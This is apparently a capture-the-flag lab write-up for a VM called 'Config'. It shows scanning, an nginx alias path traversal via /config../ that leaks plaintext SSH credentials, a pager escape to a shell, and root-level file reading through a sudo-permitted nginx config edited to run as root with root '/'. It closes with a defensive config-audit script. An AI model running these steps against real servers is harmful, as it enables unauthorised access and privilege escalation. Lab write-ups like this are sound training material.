Information gathering
```cmd
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.1.17    08:00:27:c2:13:f5       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.1.17
```

```cmd
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 14:04 CST
Nmap scan report for 192.168.1.17
Host is up (0.00025s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: ConfigMaster - \xE6\x99\xBA\xE8\x83\xBD\xE8\xBF\x90\xE7\xBB\xB4\xE9\x85\x8D\xE7\xBD\xAE\xE7\xAE\xA1\xE7\x90\x86\xE5\xB9\xB3\xE5\x8F\xB0
MAC Address: 08:00:27:C2:13:F5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
```

Directory scanning
```cmd
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.17
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,php3,bak,gz,shtml,txt,html,bk,zip,tar
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21720]
/config               (Status: 301) [Size: 169] [--> http://192.168.1.17/config/]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
```

The scan turns up a config directory, so scan /config next.
```cmd
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.17/config
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,bk,bak,zip,tar,shtml,php3,txt,gz
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21720]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
```

Download both index pages and diff them.
```cmd
┌──(root㉿kali)-[~]
└─# curl http://$IP/index.html > index.html
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 21720  100 21720    0     0  20.1M      0 --:--:-- --:--:-- --:--:-- 20.7M

┌──(root㉿kali)-[~]
└─# curl http://$IP/config/index.html > config_index.html
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 21720  100 21720    0     0  15.4M      0 --:--:-- --:--:-- --:--:-- 20.7M

┌──(root㉿kali)-[~]
└─# diff index.html config_index.html
```

No difference between the two.
Referring to the article Vulhub-POC/Nginx 配置错误漏洞.md at master · lg996/Vulhub-POC (Nginx misconfiguration vulnerabilities), there may be a path traversal here.
```cmd
┌──(root㉿kali)-[~]
└─# curl http://$IP/config../
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>
```

It returns 403 rather than 404, so nginx resolved /config../ to a real directory: the path traversal does exist. Next, scan directories from that base.
```cmd
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config../ -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.17/config../
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php3,txt,html,bk,bak,shtml,zip,tar,gz,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/html                 (Status: 301) [Size: 169] [--> http://192.168.1.17/config../html/]
/config.txt           (Status: 200) [Size: 41]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[~]
└─# curl http://$IP/config../config.txt
SSH Credentials: mikannse/mikannsebyebye
```

That gives the SSH username and password.
```text
==================================
|       !!! WARNING !!!          |
| Unauthorized access prohibited |
| This system is monitored       |
==================================
/home/mikannse/banner.txt (END)
```

After logging in over SSH the banner is shown in a pager (note the (END) prompt); type !bash to get a shell.
```cmd
mikannse@Config:~$ ls -a
.  ..  banner.txt  .bash_history  .bash_logout  .bashrc  .lesshst  mikannse.conf  .profile  user.txt
mikannse@Config:~$ cat user.txt
flag{user-530773d6-5951-11f0-89d9-836ccaf94d6b}
```

Privilege escalation
List the commands the current user is allowed to run through sudo.
```cmd
mikannse@Config:~$ sudo -l
Matching Defaults entries for mikannse on Config:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mikannse may run the following commands on Config:
    (root) NOPASSWD: /usr/sbin/nginx -c /home/mikannse/mikannse.conf
```

The user can run /usr/sbin/nginx -c /home/mikannse/mikannse.conf as root without a password. Because the config file lives in the user's own home directory, it can be created or modified freely, so features of the nginx configuration can be used to escalate privileges.
```cmd
mikannse@Config:~$ cat mikannse.conf
user mikannse;
worker_processes auto;
pid /run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    default_type application/octet-stream;
    sendfile on;
    keepalive_timeout 65;

    server {
        listen 8080;
        server_name Config;
        root /tmp;

        location / {
            autoindex on;
            try_files $uri $uri/ =404;
        }

        access_log /var/log/nginx/mikannse_access.log;
        error_log /var/log/nginx/mikannse_error.log;
    }
}
```

Edit the config file: change user mikannse; to user root; and root /tmp; to root /;.
Run sudo /usr/sbin/nginx -c /home/mikannse/mikannse.conf, then visit http://192.168.1.17:8080/root to see the flag file.
```cmd
┌──(root㉿kali)-[~]
└─# curl http://192.168.1.17:8080/root/root.txt
flag{root-bf116e68-5953-11f0-b06c-63e27ce93d04}
```
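Both weaknesses on this box are nginx configuration mistakes, so an audit script is the natural defensive check. The following is an added example, not part of this write-up or of the box; it assumes the /config../ traversal comes from the classic alias off-by-slash pattern (the write-up never shows the site config, so that sample is constructed), and it also flags the directives that made the sudo-run mikannse.conf dangerous.

```python
import re

# Constructed sample configs; the write-up never shows the target's real site config.
# ALIAS_VULNERABLE is the classic alias off-by-slash: a prefix location with no trailing
# slash whose alias ends in one, so /config../ resolves to the alias target's parent.
ALIAS_VULNERABLE = "server { location /config { alias /var/www/html/; } }"
ALIAS_FIXED = "server { location /config/ { alias /var/www/html/; } }"
# Mirrors the write-up's edited mikannse.conf: user root, root /, autoindex on.
PRIVESC_CONF = """user root;
http { server { listen 8080; root /; location / { autoindex on; } } }"""

LOCATION_RE = re.compile(r"location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{([^{}]*)\}", re.S)
ALIAS_RE = re.compile(r"\balias\s+([^;\s]+)\s*;")

def find_alias_off_by_slash(config):
    """Return (location, alias) pairs where the location lacks the trailing slash
    that its alias target has; nginx then serves the alias's parent directory."""
    hits = []
    for modifier, path, body in LOCATION_RE.findall(config):
        if modifier in ("=", "~", "~*"):  # exact and regex locations: review by hand
            continue
        alias = ALIAS_RE.search(body)
        if alias and not path.endswith("/") and alias.group(1).endswith("/"):
            hits.append((path, alias.group(1)))
    return hits

def audit_root_run_conf(config):
    """Flag directives that are dangerous when nginx loads a user-writable config
    as root, which is exactly what the NOPASSWD sudo rule on this box permits."""
    issues = []
    if re.search(r"\buser\s+root\s*;", config):
        issues.append("workers run as root")
    if re.search(r"\broot\s+/\s*;", config):
        issues.append("document root is /")
    if re.search(r"\bautoindex\s+on\s*;", config):
        issues.append("autoindex on")
    return issues
```

The real fix for the first finding is to give the location the same trailing slash as its alias (ALIAS_FIXED); for the second, never let sudo run nginx with a config the user can write.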